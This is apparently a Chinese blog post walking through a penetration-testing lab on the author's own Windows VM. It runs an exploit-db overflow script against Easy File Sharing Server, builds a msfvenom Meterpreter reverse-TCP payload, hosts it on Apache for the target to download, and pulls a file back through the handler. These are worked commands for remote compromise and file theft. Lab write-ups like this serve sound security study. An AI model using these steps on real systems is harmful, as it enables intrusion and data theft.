复现任务A

已于 2022-11-24 10:27:10 修改
阅读量864 收藏
点赞数
分类专栏: 网络渗透测试 文章标签: web安全 测试工具 网络安全
于 2022-11-24 10:24:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62623325/article/details/128010263
版权

一、漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

先在靶机中安装efssetup_20181,并找到靶机的IP地址:

2、利用Nmap扫描发现靶机(Windows)运行了该服务。

使用kali的nmap工具扫描靶机,发现运行了easy file sharing服务:

查找出和easy file sharing服务相关的漏洞:

输入指令:

searchsploit easy file sharing

得到结果:

3、利用该漏洞,使得靶机运行计算器。

利用此漏洞:

其所在位置为:

这是一个远程溢出漏洞,利用它可以在靶机上执行计算器程序。

使用该命令执行脚本:

输入指令:

python /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机IP 80

 回到靶机可以发现计算器已经运行:

 二、Metasploit应用

使用msfvenom指令生成被控端程序,参数lhost的值即为自己的kali主机的IP地址:

输入指令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=kali主机IP lport=5000 -f exe -o /root/payload.exe

 生成的文件可以在这里找到:

使用命令启动Metasploit:

msfconsole

 按顺序输入以下命令设置并启动主控端,然后等待靶机上线:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost kali的IP

set lport 5000

exploit

将payload文件传入靶机: 

这里有两种方法将文件传入靶机,一是直接复制进去,不过这种方法在实际的渗透过程中并不现实,所以介绍第二种方法:

输入指令 ‘cd’ 进入root文件夹,输入指令 ‘ls’ 可以看见 payload.exe 在该目录下:

cd/root

输入指令 ‘cp’ 复制 payload.exe 文件,然后启动apache2,把kali变成一个服务器(他人可以访问你的kali,下载文件),并把payload.exe文件改成名为1.exe放到网上:

cp ./payload.exe/var/www/html/1.exe

service apache2 start

service apache2 status

 

 打开靶机,输入网址:kali的IP/1.exe,下载1.exe文件并运行:

此时靶机已上线,输入命令 ‘ls’ 查看靶机的桌面都有什么文件(当然也可以输入指令 ‘cd’ 进入任意文件夹,例如进入C盘):

这里我们打算下载它在桌面的名为 ‘1.txt’ 的文件(上图白底一行),输入指令 download 1.txt(要下载的文件名) var(文件的保存路径) :

例如下载 1.txt这个文件:

download 1.txt var

显示已经下载成功:

 进入到文件的保存位置:

打开该文件:

再进入到靶机确认是否是所下载的文件:

显然内容是一样的,证明操作是成功有效的

等凌晨日出
关注
专栏目录
复现a20210415RAW (2)1
08-08
标题 "复现a20210415RAW (2)1" 暗示了这是一个关于在RAW图像领域复现某个特定研究项目的工作,可能是对2021年4月15日进行的一项实验或研究的再实现。描述中的 "(1)072Due to the lack of large-scale RAW image ...
Hiera 论文代码复现
08-20
虽然现在各种各样版本的 Vision Transformer 模型带来...Hiera比目前在图像识别任务上的工作更有效,并且在视频任务上超越了最先进的技术。如果有什么疑问欢迎在评论区提出,对于共性问题可能会后续添加到文章介绍中。
基于pytorch的DenseFuse复现.zip
11-10
PyTorch还具有强大的GPU加速功能,适用于大规模的计算任务。 **2. DenseFuse算法原理** DenseFuse的核心思想是利用深度学习的方法对多源图像进行逐像素的融合处理。首先,算法通过卷积神经网络(CNN)提取输入图像...
脑机接口运动想象源码复现
02-20
python代码,数据集为BCI IV-2a ,四分类任务,网络模型EEG-TCNet 基于tensorflow EEG-TCNet: An Accurate Temporal Convolutional Network for Embedded Motor-Imagery Brain–Machine Interfaces
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 2315
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)——自学2024
2401_84466325的博客
09-09 1897
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1961
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全】-文件上传漏洞实战-upload-labs(0~16)
weixin_65311462的博客
09-09 1485
准备:一句话木马:
网络安全】漏洞挖掘:文件上传实现Webshell
等风来
09-10 422
接着,我上传webshell.php文件,文件内容为payload,拦截请求包,将文件名修改为jpg,但回显错误,这说明服务器验证了文件的内容。
网络安全】-文件上传漏洞
weixin_65311462的博客
09-10 911
文件上传漏洞指hacker能利用网站能让用户上传文件的功能,在上传过程中上传木马,直接连接或配合文件包含漏洞获取webshell,从而导致用户权限丢失,隐私泄露。成功getshell后hacker还可以长期控制受影响的网站或服务器,进行持续性的攻击和破坏,甚至会将受控制的服务器作为攻击其他目标的跳板,利用该服务器的资源和网络带宽发起更广泛的网络攻击。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 693
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-14 994
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
零基础小白能学网络安全吗?
2401_83781461的博客
09-11 283
网络安全涉及很多内容、计算机网络、暴力破解、安全工具、漏洞扫描、渗透测试、社会工程学、密码学、编程能力等等等等,学习起来需要大量的时间和精力。首先,问出这个问题的朋友,我大致判断一下,你对网络安全并不了解,只是单纯看到某个视频某篇文章,对其感兴趣,说白了你没有足够的动力驱动。但这并不意味着你不能学习。如果你正好是相反之人,可以先接触学学看,如果真的很难理解其中的概念和原理,那么或许你真的不适合学习网络安全。在大众眼中,网络安全可能就是黑别人网站的,账号被盗了能帮忙找到的,还有遇见老赖问能不能找到这个人的。
网络安全】-文件下载漏洞-pikachu
weixin_65311462的博客
09-11 1054
网站对用户查看和下载文件不做限制,使hacker可以利用利用这些文件进行提权操作,完全控制服务器,进而以服务器为跳板攻击网站其他系统,进一步扩大攻击范围。文件上传漏洞是指hacker利用网站或web应用系统中用户上传文件的功能,在上传过程中上传恶意文件,这些恶意文件在服务器端被解析时产生漏洞,从而导致攻击者能够在服务器上执行任意代码的一种安全漏洞。
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
WAJXY2021的博客
09-12 967
整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。
网络安全】PHP配置注入漏洞
等风来
09-14 210
auto_prepend_file 是 PHP 配置选项,可以在执行脚本前自动包含指定文件。这里我们设置为 /etc/passwd,试图读取系统敏感信息。
activity A 跳转 activity B 如何才能复现 activity A 不走onPause
07-14
在这种情况下,Activity A不会走`onPause`方法,因为它所在的任务栈已经不再可见。 2. 使用`finish()`方法立即关闭Activity A:如果在启动Activity B之前立即调用了Activity A的`finish()`方法来关闭它,那么...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值